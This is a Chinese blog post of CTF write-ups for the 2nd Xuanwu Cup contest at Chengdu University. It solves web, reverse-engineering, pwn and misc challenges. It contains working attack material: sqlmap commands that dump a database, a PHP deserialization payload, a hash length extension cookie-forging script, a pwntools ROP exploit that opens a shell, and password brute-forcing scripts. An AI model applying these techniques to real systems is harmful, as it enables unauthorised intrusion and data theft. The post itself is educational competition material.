2019-11-17

【WriteUp】成都大学第二届玄武杯CTF信息安全竞赛题解

Web

GET

Description:

赛题地址：http://47.93.249.236:10006/

Solution:

网页如下：

<?php
error_reporting(0);
include('flag.php');
if($_GET['p1'] == '' or $_GET['p2'] == '') {
    header('location: index.php?p1=CDUSEC&p2=CTF');
}

highlight_file('index.php');
print $_GET['p1'];
print '<br>';
print $_GET['p2'];
print '<br>';

if($_GET['p3'] === 'flag') {
    print $flag;
}
?>

友好的入门 web 题，输入以下网址即可

1	http://47.93.249.236:10006/index.php?p1=CDUSEC&p2=CTF?&p3=flag

Flag:

1	flag{A~E4sy-pHp}

POST

Description:

赛题地址：http://47.93.249.236:10007

Solution:

源码如下：

<?php
error_reporting(0);
include('flag.php');
if($_GET['p1'] == '' or $_GET['p2'] == '') {
    header('location: index.php?p1=CDUSEC&p2=CTF');
}

highlight_file('index.php');
print $_GET['p1'];
print '<br>';
print $_GET['p2'];
print '<br>';

if($_POST['p4'] === 'flag') {
    print $flag;
}

这里用 curl 命令也行

1	curl -X POST -d "p4=flag" -vi "http://47.93.249.236:10007/index.php?p1=CDUSEC&p2=CTF"

Flag:

1	flag{Tw0~E4sy-pHp}

百度

Description:

赛题地址：http://47.93.249.236:10005/

Solution:

御剑扫描出了http://47.93.249.236:10005/robots.txt

flag 就在这里面写着

Flag:

1	flag{BoBo-RoRo-ToTo}

SQL-1

Description:

解题地址：http://47.93.249.236:10001/

Solution:

我只会 sqlmap ……

1 2	sqlmap -u "http://47.93.249.236:10001/index.php" --data="username=1&password=1" --technique T --time-sec 2 --current-db current database: 'mydb'

sqlmap -u "http://47.93.249.236:10001/index.php" --data="username=1&password=1" --technique T --time-sec 2 -D mydb --tables
Database: mydb
[1 table]
+-------+
| users |
+-------+

sqlmap -u "http://47.93.249.236:10001/index.php" --data="username=1&password=1" --technique T --time-sec 2 -D mydb -T users --columns
Database: mydb
Table: users
[3 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | tinyint(4)  |
| password | varchar(20) |
| username | varchar(20) |
+----------+-------------+

sqlmap -u "http://47.93.249.236:10001/index.php" --data="username=1&password=1" --technique T --time-sec 2 -D mydb -T users -C password --dump
Database: mydb
Table: users
[1 entry]
+--------------------+
| password           |
+--------------------+
| flag{sql1-wArn1ng} |
+--------------------+

Flag:

1	flag{sql1-wArn1ng}

WeekPassword

Description:

赛题地址：http://47.93.249.236:10002/

科普：webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境，也可以将其称做为一种网页后门。黑客在入侵了一个网站后，通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起，然后就可以使用浏览器来访问asp或者php后门，得到一个命令执行环境，以达到控制网站服务器的目的。

Solution:

用 BurpSuite 的 Intruder 爆破即可，密码是000000

Flag:

1	flag{Fine_WeBsH3ll}

serialization-1

Description:

赛题地址：http://47.93.249.236:10009/index.php

Solution:

题目代码：

<?php
error_reporting(0);
class Test
{
    private $a = 'nothing';

    public function __destruct()
    {
        if($this->a != 'nothing') {

            highlight_file('flag.php');
        }
        else {
            echo 'No Flag!';
        }
    }
}

if(isset($_GET['data'])) {
    unserialize($_GET['data']);
}
else {
    highlight_file(__FILE__);
}

反序列化的题，随便构造一下就过去了

1	http://47.93.249.236:10009/index.php?data=O:4:"Test":1:{s:7:"%00Test%00a";s:1:"a"}

回显如下

1
2
3

 <?php
$flag = 'flag{0030-0571-8890-4673}';
?>

Flag:

1	flag{0030-0571-8890-4673}

矛盾

Description:

赛题地址：http://47.93.249.236:10004/

Solution:

题目源码：

 <?php
include('flag.php');
$f1 = @$_GET['f1'];
$f2 = @$_POST['f2'];
$f3 = @$_COOKIE['f3'];

if($f2 !== '0') {
    echo 'no';
}
else {
    if($f1 == 0 and $f1 !== 0) {
        $f2 == $f3;
        if(md5($f2) == 0 and $f2 == 0) {
            echo $flag;
        }
    }
}
highlight_file(__FILE__); 
?>

直接用 POST 方式传参f2=0即可绕过

Flag:

1	flag{Due_to_weak_type:)}

有趣的上传点

Description:

赛题地址：http://47.93.249.236:10003/

Solution:

不会等 wp

Flag:

无

Hash

Description:

赛题地址：http://47.93.249.236:10008/

Solution:

进去页面看源码发现有个hint.php，进去看到了源码，分析可知是哈希长度扩展攻击

function ctt($key)
{
	$t="";
	for($i=0;$i<strlen($key);++$i)
	{
		$t.=chr(ord($key[$i])^$i);
	}
	
	return $t;
}
            $auth = false;
            $role1 = "xxxxxxxxx";
            $salt = "xxxxxxxxxx";//长度不超过15
            if (isset($_COOKIE["role_true"])) {
                $hsh = $_COOKIE["hsh"];
                if ($_COOKIE["role_true"] === $role1 && $hsh === md5($salt.urldecode($_COOKIE["role"]))) {
                    $auth = true;
                } else {
                    $auth = false;
                }
            } else {
                $s =$role1;
                setcookie('role',ctt(base64_encode($s)));
				
                $hsh = md5($salt.ctt(base64_encode($s)));
                setcookie('hsh',$hsh);
            }
            if ($auth) {
                echo "<h3>Welcome Admin. Your flag is ";
            } else {
                echo "<h3>Only True Admin can see the flag!!</h3>";
            }

我们用alert(document.cookie)在控制台获取网页的 cookie 值

1	role=YVPweR3oRN%3B%7Bnj32; hsh=5beee4019e55f453db9daf0df7d90879

经过反推，我们可以获得真实的$role1值为adminadmin
因为ctt(base64_encode($s))的值为YVPweR3oRN;{nj32
且md5($salt.ctt(base64_encode($s)))的值为5beee4019e55f453db9daf0df7d90879

接下来就是写脚本的时间了

import hashpumpy
import urllib
import requests

for i in range(1, 40):
    m = hashpumpy.hashpump('5beee4019e55f453db9daf0df7d90879', 'YVPweR3oRN%3B%7Bnj32', 'binLep', i)
    print i
    url = 'http://47.93.249.236:10008/'
    digest = m[0]

    message = urllib.quote(urllib.unquote(m[1]))
    cookie = 'role=' + message + '; hsh=' + digest + '; role_true=adminadmin'
    headers = {
        'Cookie': cookie,
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        'Accept-Language': ':zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
        'Accept-Encoding': 'gzip, deflate'
    }
    print headers
    re = requests.get(url=url, headers=headers)
    print re.text
    if "flag{" in re.text:
        print re;
        break

Flag:

1	flag{hash_and_php_are_very_good!!!}

Reverse

计算题

Description:

输入需要的字符，会返回正确的flag
附件 https://ctf.cdusec.com/upload/Windows.zip

Solution:

输入cdusecre即可，用 IDA 能看出来

Flag:

1	flag{cdusecre_1}

一千次Flag

Description:

一千次一个flag，童叟无欺
附件:https://ctf.cdusec.com/upload/RECCC.zip
hint:使用OllyDBG进行动态调试(网上的版本都行)

Solution:

用 CE 可以看出计数的数据地址为0x004A32C0

这样我们就能找到具体的函数地址，为0x00401277

在函数里有一个 if 语句if ( dword_4A32C0 == 1000 )，这里我用 IDA 的 patch 直接把 1000 改为 1，方便调试

接下来发现只有 flag 的前 10 位能够正常显示，到后面就变成加密形式也不能复制了

我们进入修改的 if 语句里面调用对函数看看result = sub_401323();

可以看到这段代码

1 2	if ( dword_4A32C4 > 10 ) result = sub_4015F8((HWND)0x52010001, 369164292, 18, -1, (unsigned __int8 *)2, 0);

我们把这段代码里面的 10 patch 大一点就好了，比如说 0x20

然后应用 patch，再点点鼠标就完了

Flag:

1	flag{5538189634510}

你会用Android Studio吗

Description:

Android Studio Usage
附件 https://ctf.cdusec.com/upload/as.zip

Solution:

flag 在 hanhan.java 里，base64 解码一次就行了

Flag:

1	flag{You are simple and honest}

猜数？

Description:

Linux Reverse
What’s the number？
附件 https://ctf.cdusec.com/upload/Linux.zip

Solution:

利用 pwndbg 在汇编cmp [rbp+var_10], rax处下个断点b *$rebase(0x8E6)

然后根据 IDA 里面显示的字符串填数就完了

具体 gdb 步骤如下

start
start
b *$rebase(0x8E6)
随便输入什么东西
p $rbp - 0x10  [显示 --> $1 = (void *) 0x7fffffffdfb0]
x/w 0x7fffffffdfb0  [显示 --> 0x7fffffffdfb0:	23231]

Flag:

1	flag{cdusec_wsj_23231}

python

Description:

Run it With Python
附件 https://ctf.cdusec.com/upload/2.py

Solution:

源码如下：

print("Plase input your flag:")
b = b'\x65\x6f\x62\x64\x78\x60\x67\x76\x70\x66\x60\x5c\x71\x66\x60\x31\x5c\x66\x62\x70\x7a\x7e'
a = input()
a = a.encode()
c = ''
for i in a:
    #print(i)
    c = c + chr(i ^ 3)
#print(c)

if c.encode() == b:
    print("youare right:")
    print(a)
else:
    print("wrong!")

逆着推即可

exp如下：

b = b'\x65\x6f\x62\x64\x78\x60\x67\x76\x70\x66\x60\x5c\x71\x66\x60\x31\x5c\x66\x62\x70\x7a\x7e'
c = b.decode()
a = ''
for i in c:
    a += chr(ord(i) ^ 3)

a = a.decode()
print a

Flag:

1	flag{cdusec_rec2_easy}

Pwn

Shell

Description:

Get Shell With Pwntools
附件 https://ctf.cdusec.com/upload/pwn.zip

Solution:

送分题，不过给的后门没法直接用，需要自己构造一下

exp如下：

#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *

debug = 0
# context(log_level="debug", arch="amd64", os="linux")
if debug == 1:
    p = process('./Shell')
else:
    p = remote('47.93.249.236', 10010)
elf = ELF('./Shell', checksec=False)
plt_system = elf.plt['system']
addr_rdi_r = 0x0000000000400633  # pop rdi ; ret

pd = 'a' * 0x12
pd += p64(addr_rdi_r)
pd += p64(0x40065B)
pd += p64(plt_system)
p.send(pd)
p.interactive()

Flag:

1	flag{cdusec_Pwn_New_Star!}

Misc

G1F

Description:

你相信目光的速度吗？
附件:https://ctf.cdusec.com/upload/Misc.rar

Solution:

从这直接看到信息

1
2
3

strings 2.gif | grep flag

flag is not here,try the 'pk'

直接改后缀为 rar，出现一堆加密字符

%26%23113%3B%26%23119%3B%26%23108%3B%26%23114%3B%26%23123%3B%26%23744810295113%3B%26%2349%3B%26%23121%3B%26%23111%3B%26%2395%3B%26%2369%3B%26%23115%3B%26%2349%3B%26%23100%3B%26%23125%3Bw+h+a+t%27s%20t+h+e%20n+e+x+t%20a+f+t+e+r+t%20t+h+e+U+R+L

Unescape后

1	qwlr{&#744810295113;1yo_Es1d}w+h+a+t's t+h+e n+e+x+t a+f+t+e+r+t t+h+e+U+R+L

将中间部分补全以后进行转义得到如下字符串

1	qwlr{J0f_q1yo_Es1d}w+h+a+t's t+h+e n+e+x+t a+f+t+e+r+t t+h+e+U+R+L

再来个正常凯撒一连串爆破解密就好

Flag:

1	flag{Y0u_f1nd_Th1s}

Base

Description:

Base64 32 16 run run run run run!
附件: https://ctf.cdusec.com/upload/Base.zip

Solution:

写了个脚本

exp如下：

import base64

str_enc = 'R1JBVEtRSlVHTTJUTU5DQ0dSQ0RJTVpVSVkyRUVOSlNHUkFUSU5KVUlJMlRJTkNER01aRElPSlVHVTJUU05KVkdNWkRLTlJVR00yVE1OQlhHUVpESU9CVUdZMkRTTkpXR1JCVEdNUlVJRTJUTU1aVkdRM0RJTkpWR0kyVEdOQ0dHUkJES01SVUhFMlRJTkJWR1UyREtOQlRHSTJFQ05KV0dNMkRJTkpUR1EyVEVOQ0NHVVpESU5aVUdZMkRRTkJWR1E0VEtOSlZHTTJETU5DQkdWQVRHTkpVRzQyVE9OQ0VHUVpUS01aVUlJMlRFTkJaR1UyRElNSlZHUTJUR05CV0dSQkRJTkpWSUUyVE1OQlRHVTNESU1aVkdNMkRTTkpXR1E0RElOWlZHNDJURU5DQkdVWkRJUUpWR1kyRUVOQlZHTVpER05SVkdNMkVNTkJaR1UzRElRUlZHUTJEQ05KVUdVWlRLTkpVSUkyVEtOSlpHVTJUR05CVUlRMkRHTkJXR1EzVElNUlVJRTJES05CWkdVM1RLTVpVR00yRUNOS0JHUkJESU5KVUlJWlRNTkpUR1JDVElRUlZHSTJFQ05CVkdSQ0RLTkJWR00yREtOQ0NHUTJUS1FKVUdZMkRHTVpTR1VaVElSSlZHQTJERU5CWUdRMlRJUVJWR1kyRUNOSlVHUkJESU5SVUlJMkRNTkNDR1JDRElRUlVJWTJET05CU0dRWlRLTkJVR0UyVEtOSlRHVTJUSVFSVUdVMlRTTkJWR00yREdNUlRHSTJFQ05KUUdSQVRJTlpWR1UyRFNOSldHUkJUS09KVUlFMlVDTkpXR1UyVElRUlVJUTJFRU5DR0dSQ1RJUUpVSEUyVFFOSlRHVTJES01aVUdZMkVFTkpWR1U0VEtOSlRHUTJURU5CVEdVM0RLTUJVR0kyRE9OSllHVTJUS01KVUlFMlRDTkNDR1JBVElRUlVHNDJEU05KUkdVWlRJUlJVSUkyVEVOQlRHVTRES05KVkdRMkVHTVpTR1JCRElRSlVHUTJES01aVUdVWkRJTVpWR1kyRE9OQldHUTNUS05SVUhFMlRJTkNER1U0VElRSlZJRTJER05KV0dRWlRJUkJUR0kyVEVOQ0NHVVpESVFSVkdRMkRHTkpVR1JCVEdNUlVJRTJUS05KWkdRM0RJTkpWR1kyREdOSlNHUTNUSU5SVUhBMkRNTkJaR1UzRElRWlRHSTJFQ05KV0dRWlRJTlJVSUlaVE1OQlRHUkRESVFSVkdJMkRTTkpVR1FaVEtOQlVJTTJFRU5DQ0dRMlRLT0pWR1VaVElOSlNHUkJES05SVUc0MkRFTkJZR1EyVElPSlZHWTJFR05KWkdSQVRLTlJUR1UyREtOQlRHUkNESU1aVkdNMkRTTkpTR1JCREtOQlVHRTJUSU5KVEdVMlRJUVJWR1UyVUNOSldHUVpUS05SVUdNMlRHTkJaR1ZBVElPQlVHWTJEU05KVkdSQVRLTVJVSUUyVE1OQ0NHUTJUR01SVEdVWlRFTkNHR1E0VEtOUlVJUTJUSU5CVEdVMkRLTVpVR1UyRUVOSldHTTJES05KVEdRMlRFTkJUR1UzRElOWlVHSTJFQ05CV0dRNFRLTkpVSUUyVEVOQ0JHVkFUSVFSVUdVMkVFTVpXR1VaVElSSlVJSTJURU5DQ0dVNERLTUpWR1EyVEdOSlZHUkJESU5KVkhFMlRLTVpTR1UzRElNWlVJVTJUQU5CV0dRNERJTkpVSUkyVE1OQ0JHVVlUSVFKVklFMkVFTkJXR1FaVElSSlVJSTJFS05KUUdSQVRJTUpWR1EyREdOSlVHUkJUSVFSVUlJMkRLTkpaR1EyVEdOQlZHWTJER05KV0dRM1RJUkpVSEUyVE1OQlpHVTJUS01aVUc0MkVDTktCR1FaVElOUlVJSTJFSU5DQ0dVWURJUVJWR0kyRE9OSllHUkRES05CVkdNMlRLTkJaR1UyVEtPSlZHVVpUSU5KU0dRWlRLTlJWR0EyREVOQllHUTRES05KVklFMlVDTkpSR1JCRElRSlVJSTJETU5DQ0dSQ0RJTVpVSVkyRUtOQ0ZHUTJUS09CVkdVMlRJTkNDR1EyVElRUlVJRTJESU5CVkdNMkRLTVJVR00yVEVOQlhHUVpESVFKVUdVMkRTTkpaR1ZBVEtOUlVJRTJVQ05CVEdVM0RJTVpUR1kyVEdOQ0ZHUTRUS01SVUlJMlRRTkpSR1UyREtNUlZHRTJEU05KVkdVNFRLTkpUR0laVEVOSlRHVVpESU5aVUdJMkRRTkJWR1JCREtOUlVJRTJUQ05DQkdWQVRJT0pWR1FaVEVOSlFHUTRUR1JBPQ=='
str_enc = base64.b64decode(str_enc)
str_enc = base64.b32decode(str_enc)
str_enc = base64.b16decode(str_enc)
str_enc = base64.b32decode(str_enc)
str_enc = base64.b64decode(str_enc)
str_enc = base64.b16decode(str_enc)
str_enc = base64.b64decode(str_enc)
str_enc = base64.b16decode(str_enc)
str_enc = base64.b32decode(str_enc)
str_enc = base64.b64decode(str_enc)
print str_enc

Flag:

1	flag{Cdu_sec_Base64}

签到

Description:

怎么做CTF题呢？
首先，我会告诉你这道题的flag

是: flag{welc0me_to_cdusec_Ctf}

然后，把上面这串答案，粘贴到下面的框框里
再点击提交，这道题就解出来了

很简单吧，来试试？

第二届玄武杯交流群：963109101

Solution:

水过

Flag:

1	flag{welc0me_to_cdusec_Ctf}

键盘密码

Description:

RESXCQAZWDXTGBNJUEWQASDCXZWERSXDFCVEWQAZXC

flag格式：flag{*************}

Solution:

照着键盘画画就好了

RESXC     --> C
QAZWDX    --> D
TGBNJU    --> U
EWQASDCXZ --> S
WERSXDFCV --> E
EWQAZXC   --> C

Flag:

1	flag{CDUSEC}

大力出奇迹

Description:

附件 https://ctf.cdusec.com/upload/baopo.zip

hint
密码长度为五位
数字当然不能少
字母有大也有小
没有符号和空格
快来猜猜密码啥
猜对你就进去啦

Solution:

用Ziperello爆破即可，密码为f0rC3

Flag:

1	flag{Aestheticization_of_violence}

流量分析题

Description:

附件: https://ctf.cdusec.com/upload/flag.pcapng

Solution:

因为是招新赛，估计 flag 是摆在明面上的，直接用 strings 命令了

1	strings flag.pcapng \| grep flag

Flag:

1	flag{tcpip_is_awesome}

密码是啥

Description:

有一天郭大佬忘了后台管理密码是啥，只记得密码的不加盐md5前四位是b996，后三位是3e2，长度为5.大小写都有，你能帮忙找到后台管理密码吗？
flag格式:flag{*****}

Solution:

写脚本爆破即可，不过有两个情况都满足，不是出的很好

exp如下：

import hashlib
import string

str_enc = ''
s = string.ascii_letters
s = s[::-1]
print str_enc
for i1 in s:
    str_enc += i1
    for i2 in s:
        str_enc += i2
        for i3 in s:
            str_enc += i3
            for i4 in s:
                str_enc += i4
                for i5 in s:
                    str_enc += i5
                    hsh = hashlib.md5(str_enc).hexdigest()
                    print str_enc
                    if hsh[0: 4] == 'b996' and hsh[-3:] == '3e2':
                        print 'hsh     = ' + hsh
                        print 'str_enc = ' + str_enc
                        print 'flag    = flag{' + str_enc + '}'
                        exit(1337)
                    str_enc = str_enc[: -1]
                str_enc = str_enc[: -1]
            str_enc = str_enc[: -1]
        str_enc = str_enc[: -1]
    str_enc = str_enc[: -1]

一个情况是CdHsh，对应b99648ad338f83a9ace00e19f97b53e2
另一个情况是FjcOy，对应b9966524dbef725a3ad170446855d3e2

Flag:

1	flag{CdHsh}

本文标题:【WriteUp】成都大学第二届玄武杯CTF信息安全竞赛题解

文章作者:binLep

发布时间:2019-11-17, 16:17:00

最后更新:2019-11-17, 16:22:40

原始链接:https://binlep.github.io/old_blog_01/2019/11/18/【WriteUp】成都大学第二届玄武杯CTF信息安全竞赛题解/

许可协议: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。